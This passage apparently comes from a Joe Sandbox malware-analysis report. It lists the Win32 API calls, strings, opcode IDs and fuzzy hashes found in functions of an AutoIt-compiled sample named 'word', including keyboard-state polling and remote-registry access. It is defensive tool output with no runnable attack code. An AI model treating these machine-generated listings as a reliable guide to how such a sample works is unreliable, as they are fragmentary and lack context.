                                                                      • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                      • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                      • Part of subcall function 00456354: GetAsyncKeyState.USER32 ref: 004563D0
                                                                      • Part of subcall function 00456354: GetAsyncKeyState.USER32 ref: 004563DC
                                                                    • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                    • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                    • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                    • ReleaseCapture.USER32 ref: 0046F589
                                                                    • SetWindowTextW.USER32(?,00000000,?,?,00000000,00000000,?,00000000), ref: 0046F620
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$X1$HH
                                                                    • API String ID: 2483343779-1152653511
                                                                    • Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                    • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                    • Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                    • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                    • __swprintf.LIBCMT ref: 0045E6EE
                                                                    • _printf.LIBCMT ref: 0045E7A9
                                                                    • _printf.LIBCMT ref: 0045E7D2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString_printf$__swprintf_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 3590180749-2354261254
                                                                    • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                    • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                    • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                    • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 3038501623-2263619337
                                                                    • Opcode ID: 162ad9b24d5c2bc10ff2a2931a2202da34f9a903f5081224f76d06b88a28f86a
                                                                    • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                    • Opcode Fuzzy Hash: 162ad9b24d5c2bc10ff2a2931a2202da34f9a903f5081224f76d06b88a28f86a
                                                                    • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                    APIs
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                    • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                    • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                    • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                    • String ID: 2$X1
                                                                    • API String ID: 1331449709-1986367651
                                                                    • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                    • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                    • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                    • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                    APIs
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • _memset.LIBCMT ref: 00458194
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00458219
                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 2255324689-22481851
                                                                    • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                    • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                    • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                    • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00458513
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0045858A
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                    • __wcsicoll.LIBCMT ref: 004585D6
                                                                    • IIDFromString.OLE32(?,?), ref: 004585EB
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                    • String ID: ($interface$interface\
                                                                    • API String ID: 2231185022-3327702407
                                                                    • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                    • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                    • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                    • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                    • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                    • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                    • _wcscpy.LIBCMT ref: 004365F5
                                                                    • WSACleanup.WSOCK32 ref: 004365FD
                                                                    • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                    • _strcat.LIBCMT ref: 0043662F
                                                                    • _wcscpy.LIBCMT ref: 00436644
                                                                    • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                    • _wcscpy.LIBCMT ref: 00436666
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 2691793716-3771769585
                                                                    • Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                    • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                    • Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                    • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                      • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                      • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B58
                                                                    • GetProcAddress.KERNEL32(00411739,DecodePointer,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B68
                                                                    • __lock.LIBCMT ref: 00416B8A
                                                                    • InterlockedIncrement.KERNEL32(00EA60FF,?,00411739,00417F28,00413979,?,?,00411739), ref: 00416B97
                                                                    • __lock.LIBCMT ref: 00416BAB
                                                                    • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                    • API String ID: 1028249917-2843748187
                                                                    • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                    • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                    • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                    • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                    APIs
                                                                    • GetSysColorBrush.USER32 ref: 00410326
                                                                    • RegisterClassExW.USER32 ref: 00410359
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                    • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                    • LoadIconW.USER32 ref: 004103B1
                                                                    • ImageList_ReplaceIcon.COMCTL32(00970000,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                    • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                    • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                    • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00453C0D
                                                                    • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                    • GetAsyncKeyState.USER32 ref: 00453C82
                                                                    • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                    • GetAsyncKeyState.USER32 ref: 00453CC9
                                                                    • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                    • GetAsyncKeyState.USER32 ref: 00453D07
                                                                    • GetKeyState.USER32(00000011), ref: 00453D15
                                                                    • GetAsyncKeyState.USER32 ref: 00453D3F
                                                                    • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                    • GetAsyncKeyState.USER32 ref: 00453D77
                                                                    • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                    • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                    • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                    • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                    • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                    • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                    • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                    • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                    • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                    • String ID:
                                                                    • API String ID: 136442275-0
                                                                    • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                    • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                    • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                    • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ConnectRegistry_wcslen
                                                                    • String ID: HH
                                                                    • API String ID: 535477410-2761332787
                                                                    • Opcode ID: c1afb4e532713bbbb44462dacb90a1f1389aed0e8b25f1355f069ce5f583ed59
                                                                    • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                    • Opcode Fuzzy Hash: c1afb4e532713bbbb44462dacb90a1f1389aed0e8b25f1355f069ce5f583ed59
                                                                    • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                    • _wcslen.LIBCMT ref: 00460502
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                    • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                    • String ID: ThumbnailClass
                                                                    • API String ID: 4123061591-1241985126
                                                                    • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                    • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                    • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                    • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
